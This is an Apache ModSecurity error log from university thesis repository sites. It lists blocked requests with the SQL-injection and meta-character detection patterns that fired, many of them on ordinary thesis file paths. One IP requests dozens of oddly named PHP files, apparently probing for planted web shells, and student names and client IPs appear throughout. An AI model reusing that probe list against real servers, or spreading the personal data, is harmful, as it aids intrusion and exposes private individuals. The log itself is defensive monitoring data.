[Tue Aug 29 12:54:53.606065 2023] [:error] [pid 4037] [client 47.128.22.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jayanti Lestari\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2ILcCo-f0AAA-F8XcAAAAK"]
[Tue Aug 29 12:55:06.383273 2023] [:error] [pid 4042] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Indryani_Rumasingap_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2IOsCo-f0AAA-KmXEAAAAR"]
[Tue Aug 29 14:00:38.234408 2023] [:error] [pid 5168] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "20.0.17.166_35468770ed4f68abe5004e7b75f46e689736368e"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/juana.php"] [unique_id "ZO2XlsCo-f0AABQw9CcAAAAC"]
[Tue Aug 29 14:00:38.289475 2023] [:error] [pid 5173] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.122.100.29_510b5eb1069fc9bc5cbb80a541f68326d844607e"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/k2.php"] [unique_id "ZO2XlsCo-f0AABQ1-5MAAAAH"]
[Tue Aug 29 14:00:38.350291 2023] [:error] [pid 5324] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.213.89_06c6936bd2e49babc5d8cff65b916d05fe9bff95"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/k33n.php"] [unique_id "ZO2XlsCo-f0AABTMp6gAAAAF"]
[Tue Aug 29 14:00:38.408697 2023] [:error] [pid 5105] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.122.115.27_2bc41dac1d956feb34897c5677ba5152a791ee6b"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/ka.php"] [unique_id "ZO2XlsCo-f0AABPxzpUAAAAS"]
[Tue Aug 29 14:00:38.467491 2023] [:error] [pid 5095] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.49.204_bcd2348253f0969d8c7befda4128e96ec79886bb"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kafir.php"] [unique_id "ZO2XlsCo-f0AABPntTcAAAAE"]
[Tue Aug 29 14:00:38.527367 2023] [:error] [pid 5165] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "10.179.80.2_2f20390f4bf2c71a212308cf7c6fbb784b1f8cbf"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kage.php"] [unique_id "ZO2XlsCo-f0AABQt0uEAAAAL"]
[Tue Aug 29 14:00:38.586951 2023] [:error] [pid 5346] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "185.203.122.85_80605c54b91bb0f1d313931c2aa391b0d735190a"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kaguya.php"] [unique_id "ZO2XlsCo-f0AABTi9XAAAAAJ"]
[Tue Aug 29 14:00:38.647526 2023] [:error] [pid 5324] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "66.249.64.206_59c3d4f2509c82627f0eeb8e0e13ae1254eb4065"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kailu.php"] [unique_id "ZO2XlsCo-f0AABTMp6kAAAAF"]
[Tue Aug 29 14:00:38.708332 2023] [:error] [pid 5168] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "185.242.6.212_763852a3f35037cd5831e6206047ccfb7344e2aa"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kaito.php"] [unique_id "ZO2XlsCo-f0AABQw9CgAAAAC"]
[Tue Aug 29 14:00:38.764844 2023] [:error] [pid 5105] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "34.87.92.205_41a336c41869e40c78c3063701c2b98486271940"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kamu-kok.php"] [unique_id "ZO2XlsCo-f0AABPxzpYAAAAS"]
[Tue Aug 29 14:00:38.821017 2023] [:error] [pid 5095] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "125.164.21.123_5414df4deeef765e4672564f92643e8679a5a3d9"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kamu.php"] [unique_id "ZO2XlsCo-f0AABPntTgAAAAE"]
[Tue Aug 29 14:00:38.877346 2023] [:error] [pid 5165] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.207_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kang.php"] [unique_id "ZO2XlsCo-f0AABQt0uIAAAAL"]
[Tue Aug 29 14:00:38.939181 2023] [:error] [pid 5171] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.122.115.71_2bc41dac1d956feb34897c5677ba5152a791ee6b"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kasl.php"] [unique_id "ZO2XlsCo-f0AABQzVeQAAAAB"]
[Tue Aug 29 14:00:38.993711 2023] [:error] [pid 5346] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.4.38.49_5caa1fde52bbd6a9ea55c17b271bf7c0634832d8"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/kawaii.php"] [unique_id "ZO2XlsCo-f0AABTi9XEAAAAJ"]
[Tue Aug 29 14:00:39.054038 2023] [:error] [pid 5172] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "180.244.134.17_19c9c15973e996637ab1d87df2a55b4b7f144c95"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/js.phtml"] [unique_id "ZO2XlsCo-f0AABQ0uscAAAAD"]
[Tue Aug 29 14:02:38.220335 2023] [:error] [pid 5168] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "120.188.36.239_e9d60ca23a801a1df7e849bbb826872df8f710eb"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/xxmmglu.php"] [unique_id "ZO2YDsCo-f0AABQw9PcAAAAC"]
[Tue Aug 29 14:02:38.279744 2023] [:error] [pid 5506] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.122.109.124_4d4addfff349730a6322517a521b77cd10894329"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/vvwiapo.php"] [unique_id "ZO2YDsCo-f0AABWCt9sAAAAA"]
[Tue Aug 29 14:02:38.341084 2023] [:error] [pid 5507] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.3.201.72_07f4681311a44e45ec5ab6d0cf8f40adc90dc400"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/redirect.php"] [unique_id "ZO2YDsCo-f0AABWDCGkAAAAD"]
[Tue Aug 29 14:02:38.397363 2023] [:error] [pid 5508] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.1.229.214_7c2ea8dcd0d9e693c16b1512ec7204b42a423bf5"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/oujkoqf.php"] [unique_id "ZO2YDsCo-f0AABWEbQMAAAAE"]
[Tue Aug 29 14:02:38.519089 2023] [:error] [pid 5489] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.216.101_35468770ed4f68abe5004e7b75f46e689736368e"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/hkvk.php"] [unique_id "ZO2YDsCo-f0AABVxdsIAAAAk"]
[Tue Aug 29 14:02:38.587782 2023] [:error] [pid 5384] [client 143.42.66.156] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.122.101.112_4d4addfff349730a6322517a521b77cd10894329"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/dappa.php"] [unique_id "ZO2YDsCo-f0AABUILBUAAAAM"]
[Tue Aug 29 14:38:04.948786 2023] [:error] [pid 6278] [client 114.122.104.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Mochamad_Saepul_Ramdani-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2gXMCo-f0AABiGXE0AAAAL"]
[Tue Aug 29 14:38:10.465196 2023] [:error] [pid 6264] [client 114.122.104.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 4 (9 Juni 2023) Mochamad Saepul Ramdani.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2gYsCo-f0AABh4xgMAAAAB"]
[Tue Aug 29 14:40:20.023936 2023] [:error] [pid 6373] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Indryani_Rumasingap_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2g5MCo-f0AABjl-v8AAAAE"]
[Tue Aug 29 14:41:22.294382 2023] [:error] [pid 6374] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Ade_Rizki_Fauzi_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2hIsCo-f0AABjmhtoAAAAI"]
[Tue Aug 29 14:41:29.080931 2023] [:error] [pid 6274] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER - DAFTAR LAMPIRAN Ade Rizki Fauzi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hKcCo-f0AABiCP0AAAAAF"]
[Tue Aug 29 14:41:32.777692 2023] [:error] [pid 6274] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER - DAFTAR LAMPIRAN Ade Rizki Fauzi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hLMCo-f0AABiCP0IAAAAF"]
[Tue Aug 29 14:41:41.480461 2023] [:error] [pid 6488] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I Ade Rizki Fauzi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hNcCo-f0AABlYQmwAAAAE"]
[Tue Aug 29 14:41:58.039604 2023] [:error] [pid 6521] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Eldisa_Utami_Putri-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2hRsCo-f0AABl5PDEAAAAc"]
[Tue Aug 29 14:42:01.085527 2023] [:error] [pid 6525] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Cover - daftar lampiran Eldisa Utami Putri.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hScCo-f0AABl9aQ8AAAAW"]
[Tue Aug 29 14:42:43.910412 2023] [:error] [pid 6525] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Eldisa_Utami_Putri-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2hc8Co-f0AABl9aRUAAAAW"]
[Tue Aug 29 14:42:46.670299 2023] [:error] [pid 6534] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Cover - daftar lampiran Eldisa Utami Putri.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hdsCo-f0AABmGk0QAAAAL"]
[Tue Aug 29 14:42:54.651391 2023] [:error] [pid 6533] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_1_(2)_Siti_Aisyah-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2hfsCo-f0AABmFQEMAAAAK"]
[Tue Aug 29 14:42:57.404055 2023] [:error] [pid 6522] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER - Daftar Lampiran Siti Aisyah.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hgcCo-f0AABl6Ij0AAAAF"]
[Tue Aug 29 14:43:08.981444 2023] [:error] [pid 6525] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER - Daftar Lampiran Siti Aisyah.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hjMCo-f0AABl9aRgAAAAW"]
[Tue Aug 29 14:43:20.022853 2023] [:error] [pid 6538] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/(a)_Cover_Anas_Tia_Wahyu_Handayani_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2hmMCo-f0AABmKv70AAAAN"]
[Tue Aug 29 14:43:24.318552 2023] [:error] [pid 6530] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//(a) Cover - Daftar Lampiran Anas Tia Wahyu Handayani.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2hnMCo-f0AABmC31kAAAAE"]
[Tue Aug 29 14:48:41.806367 2023] [:error] [pid 6719] [client 103.122.5.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Adelia_Kusmawardini.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2i2cCo-f0AABo-@rwAAAAN"]
[Tue Aug 29 14:49:30.707209 2023] [:error] [pid 6733] [client 103.122.5.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_ALif_AUlia_Rahman.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2jCsCo-f0AABpNMJEAAAAY"]
[Tue Aug 29 14:49:53.877757 2023] [:error] [pid 6729] [client 103.122.5.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_ALif_AUlia_Rahman.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO2jIcCo-f0AABpJEn8AAAAV"]
[Tue Aug 29 15:30:54.717667 2023] [:error] [pid 7356] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Bab I Reisma Kusdamayanti.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO2svsCo-f0AABy8Ym4AAAAV"]
[Tue Aug 29 16:24:44.199904 2023] [:error] [pid 8631] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Indryani_Rumasingap_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO25XMCo-f0AACG3vNoAAAAI"]
[Tue Aug 29 16:25:01.192864 2023] [:error] [pid 8684] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Ade_Rizki_Fauzi_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO25bcCo-f0AACHsSJMAAAAF"]
[Tue Aug 29 16:25:04.631529 2023] [:error] [pid 8681] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER - DAFTAR LAMPIRAN Ade Rizki Fauzi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO25cMCo-f0AACHpX8AAAAAE"]
[Tue Aug 29 16:25:17.066557 2023] [:error] [pid 8632] [client 180.244.138.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I Ade Rizki Fauzi.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO25fcCo-f0AACG4AvwAAAAJ"]
[Mon Aug 28 06:46:43.924953 2023] [:error] [pid 37420] [client 180.252.122.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "repositoryfh.unla.ac.id"] [uri "/browse/download/1301"] [unique_id "ZOvgY8Co-f0AAJIsPX8AAAAV"]
[Mon Aug 28 06:46:44.044101 2023] [:error] [pid 37412] [client 180.252.122.45] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "repositoryfh.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvgZMCo-f0AAJIkBRUAAAAB"]
[Mon Aug 28 07:22:33.890821 2023] [:error] [pid 37618] [client 182.3.43.198] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "repositoryfh.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvoycCo-f0AAJLyEiQAAAAH"]
[Mon Aug 28 07:29:41.303957 2023] [:error] [pid 37759] [client 36.79.184.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "repositoryfh.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvqdcCo-f0AAJN-nJQAAAAI"]
